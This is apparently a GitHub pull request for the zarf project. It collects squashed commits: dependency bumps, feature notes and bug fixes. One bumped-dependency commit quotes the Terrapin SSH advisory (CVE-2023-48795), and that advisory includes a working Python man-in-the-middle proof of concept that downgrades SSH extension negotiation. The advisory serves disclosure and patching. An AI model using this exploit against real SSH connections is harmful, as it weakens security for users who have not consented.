Rebase #2215

jbrewer3 · 2024-01-06T02:15:17Z

Description

...

Related Issue

Fixes #

Relates to #

Type of change

Bug fix (non-breaking change which fixes an issue)
New feature (non-breaking change which adds functionality)
Other (security config, docs update, etc)

Checklist before merging

Test, docs, adr added or updated as needed
Contributor Guide Steps followed

[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [pepr](https://togithub.com/defenseunicorns/pepr) | [`^0.19.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/pepr/0.19.0/20.0.0) | [![age](https://developer.mend.io/api/mc/badges/age/npm/pepr/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/pepr/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/pepr/0.19.0/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/pepr/0.19.0/20.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Release Notes <details> <summary>defenseunicorns/pepr (pepr)</summary> ### [`v20.0.0`](https://togithub.com/defenseunicorns/pepr/compare/v0.19.0...v20.0.0) [Compare Source](https://togithub.com/defenseunicorns/pepr/compare/v0.19.0...f06c3c2edc9e7d0176ad6007042a71dacdb99dc0) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/download-artifact](https://togithub.com/actions/download-artifact) | action | major | `v3.0.2` -> `v4.0.0` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Release Notes <details> <summary>actions/download-artifact (actions/download-artifact)</summary> ### [`v4.0.0`](https://togithub.com/actions/download-artifact/releases/tag/v4.0.0) [Compare Source](https://togithub.com/actions/download-artifact/compare/v3.0.2...v4.0.0) ##### What's Changed The release of upload-artifact@v4 and download-artifact@v4 are major changes to the backend architecture of Artifacts. They have numerous performance and behavioral improvements. For more information, see the [@actions/artifact](https://togithub.com/actions/toolkit/tree/main/packages/artifact) documentation. ##### New Contributors - [@bflad](https://togithub.com/bflad) made their first contribution in [https://github.com/actions/download-artifact/pull/194](https://togithub.com/actions/download-artifact/pull/194) **Full Changelog**: actions/download-artifact@v3...v4.0.0 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  --------- Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: Wayne Starr <[email protected]>

…ure `zarf prepare` (#2170) ## Description Adds a `zarf dev deploy` command that will create + deploy a local package in one shot. ## Related Issue Fixes #2169 Fixes #2098 ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [x] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [x] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed --------- Signed-off-by: razzle <[email protected]> Co-authored-by: Wayne Starr <[email protected]>

…a remote (#2160) ## Description This fixes a bug where if zarf (via crane) can't pull an image from a remote repository, and a local tarball doesn't exist, it will output the proper error from crane, versus hiding the issue as "image does not exist" ## Related Issue Fixes #2081  Relates to # ## Type of change - [x] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [x] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed --------- Co-authored-by: Wayne Starr <[email protected]> Co-authored-by: Wayne Starr <[email protected]>

## Description Updated build args to include correct version of kubectl for helm / zarf ## Related Issue Relates to #1607 ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [X] Other (security config, docs update, etc) ## Checklist before merging - [ ] Test, docs, adr added or updated as needed - [X] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed --------- Co-authored-by: Wayne Starr <[email protected]>

…2190) ## Description This PR fixes error channel handling for Zarf tunnels so lost pod connections don't result in infinite spins. This should mostly resolve 2104 though not marking it "Fixes" as depending on how many pod connection errors occur a deployment could still run out of retries. ## Related Issue Relates to #2104 ## Type of change - [X] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [ ] Test, docs, adr added or updated as needed - [X] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed

…2198) [![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [github.com/anchore/stereoscope](https://togithub.com/anchore/stereoscope) | require | digest | `3610f4e` -> `4b999b7` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

…prepare lint` (#2171) ## Description Adding warnings for unpinned images, files and repos ## Related Issue Relates to #2064 ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [X] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [ ] Test, docs, adr added or updated as needed --------- Co-authored-by: Barry Waldbaum <[email protected]> Co-authored-by: Wayne Starr <[email protected]> Co-authored-by: Lucas Rodriguez <[email protected]> Co-authored-by: razzle <[email protected]>

## Description This adds wildcard and `default` exclusion support to the `--components` field ## Related Issue Fixes #1794 Fixes #2051 Fixes #2035 ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [x] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [ ] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed

## Description Changes OCI refs from `:<version>-<arch>` to `:<version>` and instead moves that logic more correctly into the `-a/--architecture` flag. This PR also adds `flavor` to the pkg's build metadata so it can be appended to the ref: `:<version>-<flavor>` if it exists. This is because flavor is a higher level specifier than arch. - Flavors `vanilla` and `chocolate` can have `amd64/arm64/etc...` arch variants - No flavor (just `<version>`) can have `amd64/arm64/etc...` arch variants - Zarf makes OS determinations at runtime, so all OS variants of a package are built and included, regardless of `flavor` or `arch`, therefore for the platform portion of the image index created: `multi` is used to denote that the package is not directly tied to any specific OS. Example index: ```json { "schemaVersion": 2, "manifests": [ { "mediaType": "application/vnd.oci.image.manifest.v1+json", "digest": "sha256:42105043580ce0a6f5cb519a57917056597449ffc42b5be12d49f7856f3747ab", "size": 2827, "platform": { "architecture": "arm64", "os": "multi" } }, { "mediaType": "application/vnd.oci.image.manifest.v1+json", "digest": "sha256:556ced6297ff9627b99e07d0e125df1f199be4c20d9caf6024b5c53303becc15", "size": 2827, "platform": { "architecture": "amd64", "os": "multi" } } ] } ``` ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [x] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [x] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed --------- Signed-off-by: razzle <[email protected]> Co-authored-by: Wayne Starr <[email protected]> Co-authored-by: Austin Abro <[email protected]>

…2201) [![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | golang.org/x/crypto | require | minor | `v0.16.0` -> `v0.17.0` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. ### GitHub Vulnerability Alerts #### [CVE-2023-48795](https://togithub.com/warp-tech/russh/security/advisories/GHSA-45x7-px36-x8w8) ### Summary Russh v0.40.1 and earlier is vulnerable to a novel prefix truncation attack (a.k.a. Terrapin attack), which allows a man-in-the-middle attacker to strip an arbitrary number of messages right after the initial key exchange, breaking SSH extension negotiation (RFC8308) in the process and thus downgrading connection security. ### Mitigations To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex" which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes. Support for strict key exchange has been added to Russh in the patched version. **Warning: To take effect, both the client and server must support this countermeasure.** As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available. ### Details The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*[email protected] MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario. The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange. In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers. For more details and a pre-print of the associated research paper, see [https://terrapin-attack.com](https://terrapin-attack.com). This website is not affiliated with Russh in any way. ### PoC <details> <summary>Extension Negotiation Downgrade Attack (chacha20-poly1305@openssh.com)</summary> ```python #!/usr/bin/python3 import socket from binascii import unhexlify from threading import Thread from time import sleep ##################################################################################### ## Proof of Concept for the extension downgrade attack ## ## ## ## Variant: ChaCha20-Poly1305 ## ## ## ## Client(s) tested: OpenSSH 9.5p1 / PuTTY 0.79 ## ## Server(s) tested: OpenSSH 9.5p1 ## ## ## ## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ## ##################################################################################### # IP and port for the TCP proxy to bind to PROXY_IP = '127.0.0.1' PROXY_PORT = 2222 # IP and port of the server SERVER_IP = '127.0.0.1' SERVER_PORT = 22 LENGTH_FIELD_LENGTH = 4 def pipe_socket_stream(in_socket, out_socket): try: while True: data = in_socket.recv(4096) if len(data) == 0: break out_socket.send(data) except ConnectionResetError: print("[!] Socket connection has been reset. Closing sockets.") except OSError: print("[!] Sockets closed by another thread. Terminating pipe_socket_stream thread.") in_socket.close() out_socket.close() rogue_msg_ignore = unhexlify('0000000C060200000000000000000000') def perform_attack(client_socket, server_socket): # Version exchange client_vex = client_socket.recv(255) server_vex = server_socket.recv(255) client_socket.send(server_vex) server_socket.send(client_vex) # SSH_MSG_KEXINIT client_kexinit = client_socket.recv(35000) server_kexinit = server_socket.recv(35000) client_socket.send(server_kexinit) server_socket.send(client_kexinit) # Client will now send the key exchange INIT client_kex_init = client_socket.recv(35000) server_socket.send(client_kex_init) # Insert ignore message (to client) client_socket.send(rogue_msg_ignore) # Wait half a second here to avoid missing EXT_INFO # Can be solved by counting bytes as well sleep(0.5) # KEX_REPLY / NEW_KEYS / EXT_INFO server_response = server_socket.recv(35000) # Strip EXT_INFO before forwarding server_response to client # Length fields of KEX_REPLY and NEW_KEYS are still unencrypted server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH]) server_newkeys_start = server_kex_reply_length server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH]) server_extinfo_start = server_newkeys_start + server_newkeys_length client_socket.send(server_response[:server_extinfo_start]) if __name__ == '__main__': print("--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---") mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) mitm_socket.bind((PROXY_IP, PROXY_PORT)) mitm_socket.listen(5) print(f"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...") try: while True: client_socket, client_addr = mitm_socket.accept() print(f"[+] Accepted connection from: {client_addr}") print(f"[+] Establishing new target connection to {(SERVER_IP, SERVER_PORT)}.") server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.connect((SERVER_IP, SERVER_PORT)) print("[+] Performing extension downgrade") perform_attack(client_socket, server_socket) print("[+] Downgrade performed. Spawning new forwarding threads to handle client connection from now on.") forward_client_to_server_thread = Thread(target=pipe_socket_stream, args=(client_socket, server_socket), daemon=True) forward_client_to_server_thread.start() forward_server_to_client_thread = Thread(target=pipe_socket_stream, args=(server_socket, client_socket), daemon=True) forward_server_to_client_thread.start() except KeyboardInterrupt: client_socket.close() server_socket.close() mitm_socket.close() ``` </details> ### Impact This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*[email protected]), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario. --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

## Description We would like to update the helm chart version of Gitea from 8.3.0 to 10.0.0. This will allow users to use the latest IB gitea image (v1.20.5), which is currently the only IB gitea image that received the necessary fix for working with the gitea helm chart (https://repo1.dso.mil/dsop/opensource/go-gitea/gitea/-/issues/98). We tested the v1.20.5 IB image with the 8.3.0 chart and the Gitea pod fails because of a breaking change in the init-app-ini initContainer, which passes a flag (that no longer exists) to the environment-to-ini command. This error is resolved by using the 9.5.1 chart (or later). This update requires several changes to the gitea values, which you can read more about in the [gitea chart upgrading docs](https://gitea.com/gitea/helm-chart#upgrading). ### Manual Testing * created zarf init with chart and values updates (with upstream gitea image and with IB gitea image) * deployed new init pkg on local k3d cluster * deployed DUBBD 0.11.1 on top successfully ## Related Issue TBD... ## Type of change - [x] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [x] Other (security config, docs update, etc) ## Checklist before merging - [x] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed --------- Co-authored-by: Wayne Starr <[email protected]>

…by digest (#2204) ## Description Update the release workflow for the sigstore update. ## Related Issue Fixes #N/A ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [X] Other (security config, docs update, etc) ## Checklist before merging - [X] Test, docs, adr added or updated as needed - [X] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed

## Description Small fix for signing in the release workflow ## Related Issue Fixes #N/A ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [X] Other (security config, docs update, etc) ## Checklist before merging - [X] Test, docs, adr added or updated as needed - [X] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed

## Description When using Zarf's OCI client: `OrasRemote`, there is backwards compatibility to support previous package references. Old packages were published under image manifests, while new packages are published under image indexes. Resolving the manifest stored within an image index requires knowing which os/arch (`ocispec.Platform`) to search for. All internal usages of this client properly use the `oci.WithArch` or `oci.WithPlatform` modifiers that add a `targetPlatform` to the client so that `r.ResolveRoot` is able to properly leverage `oras.ResolveOptions` and locate the correct manifest within the index. However, if no platform modifier is used, `targetPlatform` remains `nil`. This causes `oras.Resolve` to return the descriptor of the index, not the manifest. To remedy this, simply error after the backwards compat check if no modifier was used to add a `targetPlatform` onto the remote client. ## Type of change - [x] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [ ] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed Signed-off-by: razzle <[email protected]>

…ntainerd/containerd to v1.7.11 [security] (#2209) [![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [github.com/go-git/go-git/v5](https://togithub.com/go-git/go-git) | `v5.10.1` -> `v5.11.0` | [![age](https://developer.mend.io/api/mc/badges/age/go/github.com%2fgo-git%2fgo-git%2fv5/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/go/github.com%2fgo-git%2fgo-git%2fv5/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/go/github.com%2fgo-git%2fgo-git%2fv5/v5.10.1/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/go/github.com%2fgo-git%2fgo-git%2fv5/v5.10.1/v5.11.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. ### GitHub Vulnerability Alerts #### [CVE-2023-49568](https://togithub.com/go-git/go-git/security/advisories/GHSA-mw99-9chc-xw7r) ### Impact A denial of service (DoS) vulnerability was discovered in go-git versions prior to `v5.11`. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in `go-git` clients. Applications using only the in-memory filesystem supported by `go-git` are not affected by this vulnerability. This is a `go-git` implementation issue and does not affect the upstream `git` cli. ### Patches Users running versions of `go-git` from `v4` and above are recommended to upgrade to `v5.11` in order to mitigate this vulnerability. ### Workarounds In cases where a bump to the latest version of `go-git` is not possible, we recommend limiting its use to only trust-worthy Git servers. ## Credit Thanks to Ionut Lalu for responsibly disclosing this vulnerability to us. ### References - [GHSA-mw99-9chc-xw7r](https://togithub.com/go-git/go-git/security/advisories/GHSA-mw99-9chc-xw7r) --- ### Release Notes <details> <summary>go-git/go-git (github.com/go-git/go-git/v5)</summary> ### [`v5.11.0`](https://togithub.com/go-git/go-git/releases/tag/v5.11.0) [Compare Source](https://togithub.com/go-git/go-git/compare/v5.10.1...v5.11.0) #### What's Changed - git: validate reference names ([#929](https://togithub.com/go-git/go-git/issues/929)) by [@aymanbagabas](https://togithub.com/aymanbagabas) in [https://github.com/go-git/go-git/pull/950](https://togithub.com/go-git/go-git/pull/950) - git: stop iterating at oldest shallow when pulling. Fixes [#305](https://togithub.com/go-git/go-git/issues/305) by [@dhoizner](https://togithub.com/dhoizner) in [https://github.com/go-git/go-git/pull/939](https://togithub.com/go-git/go-git/pull/939) - plumbing: object, enable renames in getFileStatsFromFilePatches by [@djmoch](https://togithub.com/djmoch) in [https://github.com/go-git/go-git/pull/941](https://togithub.com/go-git/go-git/pull/941) - storage: filesystem, Add option to set a specific FS for alternates by [@pjbgf](https://togithub.com/pjbgf) in [https://github.com/go-git/go-git/pull/953](https://togithub.com/go-git/go-git/pull/953) - Align worktree validation with upstream and remove build warnings by [@pjbgf](https://togithub.com/pjbgf) in [https://github.com/go-git/go-git/pull/958](https://togithub.com/go-git/go-git/pull/958) #### New Contributors - [@dhoizner](https://togithub.com/dhoizner) made their first contribution in [https://github.com/go-git/go-git/pull/939](https://togithub.com/go-git/go-git/pull/939) - [@djmoch](https://togithub.com/djmoch) made their first contribution in [https://github.com/go-git/go-git/pull/941](https://togithub.com/go-git/go-git/pull/941) **Full Changelog**: go-git/go-git@v5.10.1...v5.11.0 </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  --------- Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: Wayne Starr <[email protected]>

[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [github.com/defenseunicorns/syft](https://togithub.com/defenseunicorns/syft) | replace | digest | `562ba66` -> `4d4b502` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  --------- Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: Wayne Starr <[email protected]>

[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [github.com/anchore/clio](https://togithub.com/anchore/clio) | require | digest | `767f622` -> `3e50431` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

…2206) [![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [github.com/anchore/stereoscope](https://togithub.com/anchore/stereoscope) | require | digest | `4b999b7` -> `590920d` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [github/codeql-action](https://togithub.com/github/codeql-action) | action | major | `v2.22.9` -> `v3.22.12` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Release Notes <details> <summary>github/codeql-action (github/codeql-action)</summary> ### [`v3.22.12`](https://togithub.com/github/codeql-action/compare/v3.22.11...v3.22.12) [Compare Source](https://togithub.com/github/codeql-action/compare/v3.22.11...v3.22.12) ### [`v3.22.11`](https://togithub.com/github/codeql-action/compare/v2.22.11...v3.22.11) [Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.12...v3.22.11) ### [`v2.22.12`](https://togithub.com/github/codeql-action/compare/v2.22.11...v2.22.12) [Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.11...v2.22.12) ### [`v2.22.11`](https://togithub.com/github/codeql-action/compare/v2.22.10...v2.22.11) [Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.10...v2.22.11) ### [`v2.22.10`](https://togithub.com/github/codeql-action/compare/v2.22.9...v2.22.10) [Compare Source](https://togithub.com/github/codeql-action/compare/v2.22.9...v2.22.10) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

## Description - Fix make target `lint-packages-and-examples` - Remove `-skeleton` references - Some small variable renaming + spelling fixes ## Type of change - [x] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [x] Other (security config, docs update, etc) ## Checklist before merging - [x] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed --------- Signed-off-by: razzle <[email protected]> Co-authored-by: Wayne Starr <[email protected]>

## Description `archiver@v3` does not expose the functionality needed to create tarballs with file headers containing only deterministic information. As such, back to back package `create`s against the same data will result in differences in SHAs of `components/*.tar` and `sboms.tar`. To remedy this, tarballing up these directories manually is the only current path forward in order to guarantee reproducibility. `archiver@v4` contains such functionality, but is still in `alpha`. ## Related Issue Fixes #2199 ## Type of change - [ ] Bug fix (non-breaking change which fixes an issue) - [x] New feature (non-breaking change which adds functionality) - [ ] Other (security config, docs update, etc) ## Checklist before merging - [ ] Test, docs, adr added or updated as needed - [x] [Contributor Guide Steps](https://github.com/defenseunicorns/zarf/blob/main/CONTRIBUTING.md#developer-workflow) followed --------- Signed-off-by: razzle <[email protected]> Co-authored-by: Wayne Starr <[email protected]>

[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [github.com/anchore/clio](https://togithub.com/anchore/clio) | require | digest | `3e50431` -> `89e2fe8` | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/defenseunicorns/zarf).  Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

github-advanced-security · 2024-01-06T02:15:18Z

